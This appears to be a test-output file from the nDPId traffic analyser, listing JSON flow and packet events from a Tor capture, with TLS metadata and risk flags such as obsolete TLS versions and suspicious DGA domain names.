00948{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"tor.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1383821665420,"flow_last_seen":1383821665498,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1383821665498,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"91.143.93.242","src_port":51110,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"www.ct7ctrgb6cr7.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00948{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"tor.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1383821665420,"flow_last_seen":1383821665498,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1383821665498,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"91.143.93.242","src_port":51110,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"www.ct7ctrgb6cr7.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
01160{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9,"source":"tor.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1383821665420,"flow_last_seen":1383821665606,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":748,"flow_tot_l4_payload_len":963,"flow_avg_l4_payload_len":160,"midstream":0,"thread_ts_msec":1383821665606,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"91.143.93.242","src_port":51110,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"www.ct7ctrgb6cr7.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"184d532a16876b78846ae6a03f654890","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"CN=www.xkgk7fdx362yyyxib.com","subjectDN":"CN=www.g6ghvisevf3ibuu5.net","fingerprint":"94:F9:FF:E2:7F:DB:1F:B8:19:65:20:6F:F6:DE:B6:A5:D5:AF:14:C7"}} 01160{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9,"source":"tor.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1383821665420,"flow_last_seen":1383821665606,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":748,"flow_tot_l4_payload_len":963,"flow_avg_l4_payload_len":160,"midstream":0,"thread_ts_msec":1383821665606,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"91.143.93.242","src_port":51110,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"www.ct7ctrgb6cr7.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"184d532a16876b78846ae6a03f654890","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"CN=www.xkgk7fdx362yyyxib.com","subjectDN":"CN=www.g6ghvisevf3ibuu5.net","fingerprint":"94:F9:FF:E2:7F:DB:1F:B8:19:65:20:6F:F6:DE:B6:A5:D5:AF:14:C7"}}
00358{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":25,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383821666164,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} 00344{"packet_event_id":1,"packet_event_name":"packet","packet_id":25,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383821666164,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"}
00192{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":25,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383821666212} 00178{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":25,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383821666212}
00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":26,"source":"tor.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1383821666407,"flow_last_seen":1383821666407,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1383821666407,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"46.59.52.31","src_port":51111,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":26,"source":"tor.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1383821666407,"flow_last_seen":1383821666407,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1383821666407,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"46.59.52.31","src_port":51111,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"tor.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1383821666407,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1383821666407,"pkt":"UlQA2EYhUlQAWul3CABFAAA0A2hAAIAG0l3AqAH8Ljs0H8enAbvpjJYYAAAAAIACIADhCQAAAgQFtAEDAwgBAQQC"} 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"tor.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1383821666407,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1383821666407,"pkt":"UlQA2EYhUlQAWul3CABFAAA0A2hAAIAG0l3AqAH8Ljs0H8enAbvpjJYYAAAAAIACIADhCQAAAgQFtAEDAwgBAQQC"}
00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"tor.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1383821666480,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1383821666480,"pkt":"UlQAWul3UlQA2EYhCABFAAA0AABAACwGKcYuOzQfwKgB\/AG7x6cxNPZ86YyWGYASchBnNQAAAgQFtAEBBAIBAwMK"} 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"tor.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1383821666480,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1383821666480,"pkt":"UlQAWul3UlQA2EYhCABFAAA0AABAACwGKcYuOzQfwKgB\/AG7x6cxNPZ86YyWGYASchBnNQAAAgQFtAEBBAIBAwMK"}
00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"tor.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1383821666481,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1383821666481,"pkt":"UlQA2EYhUlQAWul3CABFAAAoA2lAAIAG0mjAqAH8Ljs0H8enAbvpjJYZMTT2fVAQAQAZGwAAAAAAAAAA"} 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"tor.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1383821666481,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1383821666481,"pkt":"UlQA2EYhUlQAWul3CABFAAAoA2lAAIAG0mjAqAH8Ljs0H8enAbvpjJYZMTT2fVAQAQAZGwAAAAAAAAAA"}
01195{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":29,"source":"tor.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1383821666407,"flow_last_seen":1383821666482,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":222,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1383821666482,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"46.59.52.31","src_port":51111,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"TLS.Tor","breed":"Potentially Dangerous","category":"VPN"},"tls": {"version":"TLSv1","client_requested_server_name":"www.e6r5p57kbafwrxj3plz.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 01195{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":29,"source":"tor.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1383821666407,"flow_last_seen":1383821666482,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":222,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1383821666482,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"46.59.52.31","src_port":51111,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"TLS.Tor","breed":"Potentially Dangerous","category":"VPN"},"tls": {"version":"TLSv1","client_requested_server_name":"www.e6r5p57kbafwrxj3plz.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
01407{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":32,"source":"tor.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1383821666407,"flow_last_seen":1383821666558,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":749,"flow_tot_l4_payload_len":971,"flow_avg_l4_payload_len":161,"midstream":0,"thread_ts_msec":1383821666558,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"46.59.52.31","src_port":51111,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"TLS.Tor","breed":"Potentially Dangerous","category":"VPN"},"tls": {"version":"TLSv1","client_requested_server_name":"www.e6r5p57kbafwrxj3plz.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"184d532a16876b78846ae6a03f654890","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"CN=www.gmvuy6mtjbxevwo3w.com","subjectDN":"CN=www.bpcau5b3haif5els.net","fingerprint":"3A:B1:8A:6F:C3:F6:41:ED:77:D5:40:C3:85:79:8B:62:46:BC:65:9C"}} 01407{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":32,"source":"tor.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1383821666407,"flow_last_seen":1383821666558,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":749,"flow_tot_l4_payload_len":971,"flow_avg_l4_payload_len":161,"midstream":0,"thread_ts_msec":1383821666558,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"46.59.52.31","src_port":51111,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"TLS.Tor","breed":"Potentially Dangerous","category":"VPN"},"tls": {"version":"TLSv1","client_requested_server_name":"www.e6r5p57kbafwrxj3plz.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"184d532a16876b78846ae6a03f654890","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"CN=www.gmvuy6mtjbxevwo3w.com","subjectDN":"CN=www.bpcau5b3haif5els.net","fingerprint":"3A:B1:8A:6F:C3:F6:41:ED:77:D5:40:C3:85:79:8B:62:46:BC:65:9C"}}
00358{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":55,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383821668066,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} 00344{"packet_event_id":1,"packet_event_name":"packet","packet_id":55,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383821668066,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"}
00192{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":55,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383821668212} 00178{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":55,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383821668212}
00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":56,"source":"tor.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1383821668403,"flow_last_seen":1383821668403,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1383821668403,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"38.229.70.53","src_port":51112,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":56,"source":"tor.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1383821668403,"flow_last_seen":1383821668403,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1383821668403,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"38.229.70.53","src_port":51112,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"tor.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1383821668403,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1383821668403,"pkt":"UlQA2EYhUlQAWul3CABFAAA0A3VAAIAGx5DAqAH8JuVGNceoAbuUs9YxAAAAAIACIADrCAAAAgQFtAEDAwgBAQQC"} 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"tor.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1383821668403,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1383821668403,"pkt":"UlQA2EYhUlQAWul3CABFAAA0A3VAAIAGx5DAqAH8JuVGNceoAbuUs9YxAAAAAIACIADrCAAAAgQFtAEDAwgBAQQC"}
00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"tor.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1383821668547,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1383821668547,"pkt":"UlQAWul3UlQA2EYhCABFAAA0AABAADQGFwYm5UY1wKgB\/AG7x6iEDREglLPWMoASOQg8wAAAAgQFtAEBBAIBAwMK"} 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"tor.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1383821668547,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1383821668547,"pkt":"UlQAWul3UlQA2EYhCABFAAA0AABAADQGFwYm5UY1wKgB\/AG7x6iEDREglLPWMoASOQg8wAAAAgQFtAEBBAIBAwMK"}
00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"tor.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1383821668548,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1383821668548,"pkt":"UlQA2EYhUlQAWul3CABFAAAoA3ZAAIAGx5vAqAH8JuVGNceoAbuUs9YyhA0RIVAQAQC1nQAAAAAAAAAA"} 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"tor.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1383821668548,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1383821668548,"pkt":"UlQA2EYhUlQAWul3CABFAAAoA3ZAAIAGx5vAqAH8JuVGNceoAbuUs9YyhA0RIVAQAQC1nQAAAAAAAAAA"}
01198{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":60,"source":"tor.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1383821668403,"flow_last_seen":1383821668548,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":224,"flow_tot_l4_payload_len":224,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1383821668548,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"38.229.70.53","src_port":51112,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"TLS.Tor","breed":"Potentially Dangerous","category":"VPN"},"tls": {"version":"TLSv1","client_requested_server_name":"www.q4cyamnc6mtokjurvdclt.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 01198{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":60,"source":"tor.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1383821668403,"flow_last_seen":1383821668548,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":224,"flow_tot_l4_payload_len":224,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1383821668548,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"38.229.70.53","src_port":51112,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"TLS.Tor","breed":"Potentially Dangerous","category":"VPN"},"tls": {"version":"TLSv1","client_requested_server_name":"www.q4cyamnc6mtokjurvdclt.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
01404{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":63,"source":"tor.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1383821668403,"flow_last_seen":1383821668700,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":929,"flow_tot_l4_payload_len":1153,"flow_avg_l4_payload_len":192,"midstream":0,"thread_ts_msec":1383821668700,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"38.229.70.53","src_port":51112,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"TLS.Tor","breed":"Potentially Dangerous","category":"VPN"},"tls": {"version":"TLSv1","client_requested_server_name":"www.q4cyamnc6mtokjurvdclt.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"e1691a31bfe345d2692da75636ddfb00","unsafe_cipher":0,"cipher":"TLS_DHE_RSA_WITH_AES_256_CBC_SHA","issuerDN":"CN=www.gg562izcxdvqdk.com","subjectDN":"CN=www.fcsyvnlemwxv5p.net","fingerprint":"C1:93:18:2C:A3:1D:AC:5F:C7:DE:17:8A:4E:B1:E8:13:BB:08:73:3A"}} 01404{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":63,"source":"tor.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1383821668403,"flow_last_seen":1383821668700,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":929,"flow_tot_l4_payload_len":1153,"flow_avg_l4_payload_len":192,"midstream":0,"thread_ts_msec":1383821668700,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"38.229.70.53","src_port":51112,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"TLS.Tor","breed":"Potentially Dangerous","category":"VPN"},"tls": {"version":"TLSv1","client_requested_server_name":"www.q4cyamnc6mtokjurvdclt.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"e1691a31bfe345d2692da75636ddfb00","unsafe_cipher":0,"cipher":"TLS_DHE_RSA_WITH_AES_256_CBC_SHA","issuerDN":"CN=www.gg562izcxdvqdk.com","subjectDN":"CN=www.fcsyvnlemwxv5p.net","fingerprint":"C1:93:18:2C:A3:1D:AC:5F:C7:DE:17:8A:4E:B1:E8:13:BB:08:73:3A"}}
00358{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":80,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383821669834,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} 00344{"packet_event_id":1,"packet_event_name":"packet","packet_id":80,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383821669834,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"}
00192{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":80,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383821670213} 00178{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":80,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383821670213}
